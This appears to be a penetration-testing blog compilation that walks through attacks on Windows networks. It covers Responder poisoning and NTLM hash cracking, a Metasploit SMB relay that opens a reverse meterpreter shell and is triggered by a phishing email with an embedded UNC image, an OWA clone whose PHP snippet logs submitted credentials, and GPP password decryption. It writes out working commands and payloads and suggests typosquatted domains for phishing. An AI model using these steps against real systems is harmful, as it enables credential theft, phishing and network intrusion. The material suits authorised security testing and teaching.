Breaching a Windows environment by capturing and cracking NTLM challenge/response hashes

In this scenario we have limited physical access on a client’s network. We have been provided with an empty cubicle and only the ability to plug into the network. We have been granted no logical access and the goal is to see if take our limited physical access, gain an initial foothold within the network, and ultimately escalate our privileges throughout the environment.

The tools we’ll be using are:

Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. Link-Local Multicast Name Resolution (LLMNR) and Netbios Name Service (NBT-NS) are two components of nearly all Microsoft Windows networks. LLMNR and NBT-NS allow Windows operating systems on the same subnet help each other identify hosts if/when DNS resolution fails. If DNS resolution fails for a particular host, that computer will typically attempt to query other machines on the LAN for the correct address via LLMNR or NBT-NS.

This default behavior can be leveraged into a foothold for an attacker within the network. An attacker can impersonate the servers/services being requested by other workstations and convince the workstation to provide authentication information to it – instead of the actual server. Consider the following example:

  1. A workstation attempts to access the UNC path \\SERVER01, but mistakenly types in \\SRVER01.
  2. That workstation’s DNS server(s) responds to the query saying that it doesn’t know any host by that name.
  3. The workstation then query’s all other devices on the LAN asking if they know of the location of \\SRVER01
  4. An attacker responds to the workstation, informing it that it is SRVER01
  5. The workstation then goes through the typical challenge/response procedure to validate the domain user’s credentials. During this step, the attacker able to capture the domain user’s NTLMv2 hash.
  6. The attacker can now attempt to crack the hash to discover the domain user’s password in order to gain additional access to the environment.

2.png

To start, we need our Kali Linux box to exist on the same subnet as all the other workstations. After plugging into the network, can attempt to discover hosts on our subnet by looking at the IP address assigned to us via DHCP:

1.jpg

Using the above information, we can scan our subnet for workstations with the following command: nbtscan 192.168.23.0/24

3.jpg

This should give us enough information and insight about the network to fire up Responder and attempt to capture NTLM challenge/response hashes. If our nbtscan returned no (or limited) results, running Responder on that particular subnet would probably be ineffective.

Responder is a very powerful tool and it has the potential to break stuff on a network. I don’t plan to explain all of the capabilities and nuances of Responder – so use it at your own risk. An effective command for capturing hashes within a Windows network is: ./Responder.py -I eth0 -wrdfbF

After letting Responder run for a few minutes, we are able to capture the following Challenge/Response handshake hash when a host on the network attempts to access the below network resource:

4.jpg

We are then able to take this captured hash and feed it into John The Ripper and attempt to crack it against a dictionary file of known passwords. In this particular instance, we’re using the Rockyou file. This is seen below:

5

We can see  (above) that this particular domain user has a very weak password that was able to be cracked within 23 seconds. This was/is an actual domain user account within a production environment. With this information, we are now able to use other tools to enumerate where this user has privileges on the network and further escalate our privileges within the environment.

This topic will be covered in a future post.

SMB Relay Attack

Outlined below is one method of carrying out a NTLMv1 SMB relay attack for the purposes of obtaining a meterpreter shell on our target. For this type of attack to work, we have to insert ourselves into the NTLM challenge/response process. More on that in a minute.

First, we need to understand how NTLM challenge/response works in a basic way. When a client first attempts to connect a network share (for example), the server responds back asking the client who is making the request to encrypt some random data using the user’s password hash. This is the “challenge”.  The client encrypts the data as requested and sends it back.  This is the response. If the server is successful in decrypting the data and it matches the random data using the password hash which is/was already stored on the server, then the user is considered to be authenticated.

Using Metasploit Framework, we can create a listening SMB service and automate much of the process of inserting ourselves into the middle of the NTLM challenge/response process.

Metasploit box: 172.17.130.81
Domain Admin Workstation: 172.17.130.33
Target Server: 172.17.130.75

Our goal in this scenario is to get a shell on 172.17.130.75.

To do this, we first need to “convince” our victim (172.17.130.33) to make a connection to our Metasploit box (172.17.130.81).  To accomplish that piece, we are going to embed a UNC path referencing our Metasploit box in an email message, which will then cause the victim’s computer to carry out the NTLM challenge/response process mentioned above…however, our Metasploit box is going to relay the information to our Target (172.17.130.75) in hopes of getting a shell on the Target box.

To start, we need to fire up Metasploit Framework and load the SMB Relay mode.  This can be achieved with the following one-liner:

msfconsole -x “use windows/smb/smb_relay; set payload windows/meterpreter/reverse_tcp; set LHOST 172.17.130.81;set SMBHOST 172.17.130.75; set SRVHOST 172.17.130.81; run”

Capture1

We now need to send an email to our victim with an embedded reference to our Metasploit box which Outlook will (hopefully) automatically load for us.  To achieve this (and there may be a better way), I created a file named temp.html and typed up the following HTML code:

<html>
<head>
<img src=”\\172.17.130.81\test.jpg”></img>
</head>
</html>

After saving it, I re-opened the file using Word (2016).  I hit control-a (select all) and pasted the entire contents into an new email message (Outlook 2016), typed up a generic message to the victim, and then hit send. Below is a copy of the message that was opened on the Domain Admin’s workstation within Outlook (2016) on 172.17.130.33.

Capture8

As soon as the message is opened, the normal NTLM challenge/response process is kicked off; however, in the background, our Metasploit box is relaying the challenege/response to 172.17.130.75.  We now have our meterpreter session on 172.17.130.75.

Capture4

If we look in the Windows Event Logs on 172.17.130.75, we can see the suspicious activity and the payload being delivered and executed.

Capture5Capture6Capture7

And finally our meterpreter shell:

Capture9

OWA Website Clone + Credential Grabbing

The purpose of this post is show the necessary steps for cloning an Outlook Web Access (OWA) website and then modifying the cloned website’s code so that the inputted credentials are captured and written to a file when someone attempts to log in. A cloned OWA portal is a good method for obtaining the first set of user login credentials to a network…since the OWA creds will be the same creds needed to login to the Windows network. Once you gain credentials, you may be able to gain access to the internal LAN via Active Directory integrated VPN access, wireless access if WPA2 Enterprise is used, etc.

Before I get started, I need to a place to host the site that I want to clone.  For this example, I’m using an AWS Ubuntu server, running Apache Web Server. Installing Apache is not covered here but the below command will get you most of the way there:

apt-get install apache2 apache2-doc apache2-utils

Once Apache is installed, I need to install httrack. This tool will be used for copying/clone the site. Install by running the below command:

apt-get install httrack

Once httrack is installed, I can clone the site.  For this example, I googled and found and chose a randomly publicly accessible 2013 OWA site at https://mail.h01.hostedmail.net/owa.

Capture1

Before cloning the site, you’ll need to create a place to store it.  I’ve created a new folder named “owa-2013”.  Run the following command:

httrack https://mail.h01.hostedmail.net/owa  -O “/var/www/html/owa-2013/”  -%v -%f

Capture2

Httrack inserts advertising junk into index.html. To eliminate the advertising that comes with using httrack, run the following commands:

Capture3

The above commands basically just move logon5b91.html to the root of owa-2013 and renames that file to index.html so that it’s loaded when you visit the URL/owa-2013.

Since I’m doing this example at AWS, I need to create a couple of rules that allow incoming http and https traffic on ports 443 and 80 to my server.

Capture4

I should now be able to visit the cloned site by visiting the Public IP address of my AWS server/owa-2013.  Since I have domain registered that points to my AWS Public IP, I can browse to https://www.shellgam3.com/owa-2013 to view the cloned site. Note: I’ve setup a certificate on the domain to eliminate the security warning.  In order to purchase/setup a certificate, you’ll need to configure https for Apache and register a domain name. Alternatively, you can also host an encrypted version of the site (http), which eliminates the need for a certificate.

Capture5

Now that I’ve confirmed that the site is publicly visible, I need to rework the source code so that credentials are captured when someone enters them at the website. First, I need to create a PHP file called post.php in /var/www/html/owa-2013 that contains the below code:

<?php $file = ‘creds.txt’;file_put_contents($file, print_r($_POST, true), FILE_APPEND);?><meta http-equiv=”refresh” content=”0; url=https://mail.h01.hostedmail.net/owa”>

Credentials will be written on POST (when the user clicks “sign in”) to the file named creds.txt. After that, the site visitor will be redirected to the actual OWA site that I cloned.  This is important in order to eliminate suspicion.

Now I must modify index.html. Find the line that looks like this:

Capture6

And replace it with:

Capture7

Once completed, credentials should be written to creds.txt when someone attempts to login.

Capture8

When doing something like this on an pentest engagement, consider registering a domain name that is very similar to the organization’s domain name.  For example, if their domain name was firstnationalco.com, you could register firsttnationalco.com in hopes that the target(s) wouldn’t notice the difference.

How to trick someone into viewing the cloned site is not covered here but consider an social engineering email campaign.

Active Directory & Group Policy Privilege Escalation Vulnerability

So you’ve had a successful phishing trip and obtained a shell on a target machine that is joined up a Windows domain. Obviously, the goal is escalate privileges and pivot across the network…which is easier said than done.  This is just one technique (of many) to consider employing on your travels.

We can see below that the target computer’ s domain controller is CN-DC04.

1

We should now map a drive to the sysvol share on the DC.

2

We are ultimately trying to find groups.xml, which can be done by using the command below:

3

Once found, we want to identify the one with the most recent date.

45

Once we’ve found the file we want, we need to enter the below command: Type groups.xml

Inside this file, if we’re lucky, we’ll be able to determine the name of a local administrator account (redacted in the picture below) and also an encrypted password (in the red box, but also redacted).

6

Using a tool like gpp-decrypt in Kali Linux, we can easily determine the password.

7

In a nutshell, organizations should not use Group Policy Preferences to manage local administrator passwords for domain computers.  Instead they should use something like Microsoft LAPS, which is significantly more secure. In addition, Microsoft LAPS will ensure that all of the local administrator passwords are changed on a regular basis AND also randomized on each domain joined machine.  Those credentials are then stored in Active Directory.

Capturing And Cracking NTLMv2 Hashes On The LAN

Target Name: John Doe
Target box: 172.17.130.111 (domain joined)
Attack/facilitator box: 172.17.130.76 (Kali Linux)
Wireshark box: 172.17.130.76 (Kali Linux)

With a comprised host on the network, the idea is to get an unsuspecting victim to click a link to a network share from their workstation. As a result, when they do, it will ultimately pass NTLM challenge/response packets which can be captured and viewed using Wireshark.  Below is the process for capturing such packets, rebuilding them into a format that is usable by hashcat for the purposes of cracking their Active Directory password.

First the “victim” (John Doe) must be convinced to click on a link.  This really isn’t all that difficult but outside of the scope of this document.  Consider an email message with a link to \\172.17.130.76 (attacker/facilitator machine). Prior to clicking, we want Wireshark to be open and listening on the appropriate interface in order to capture the required packets.

Capture1

The quickest way to find the packets we are most concerned with is to setup a filter for “ntlmssp”.  From there, we only need two packets: The highlighted line, and the one directly below it.

Capture2

At this point, we want to have a text editor open so that we can copy the values from the below screenshots as plain text.  After everything is pasted into the editor, it will need to be rearranged into a particular order.

Capture3

It is important to capture the NTLMv2 Response as “Hex Stream”.

Capture4

Below is an example of the information one would need to properly built the challenge/response information back into a format that is able to be cracked. The domain username and domain name can be gleaned from the NTLMSSP_AUTH packet (2nd one in the original screenshot)  The most important thing to notice is the location of the colons. Specifically, there MUST be a colon after the first 32 bits of the NTLM RESPONCE.  This usually where you will notice a few 010101’s. Also, notice the double colons (::) after the domain username too.

Capture5

This entire string needs to be saved into a single line text file (again, remember the placement of the colons):

Capture6

Once in a text file, this file can be piped through hashcat and against your favorite wordlists using the following command:

hashcat -m 5600 asdf.txt wordlist.txt

Capture7

As seen in the screengrab above, the password for John Doe’s AD account is “Summer2016”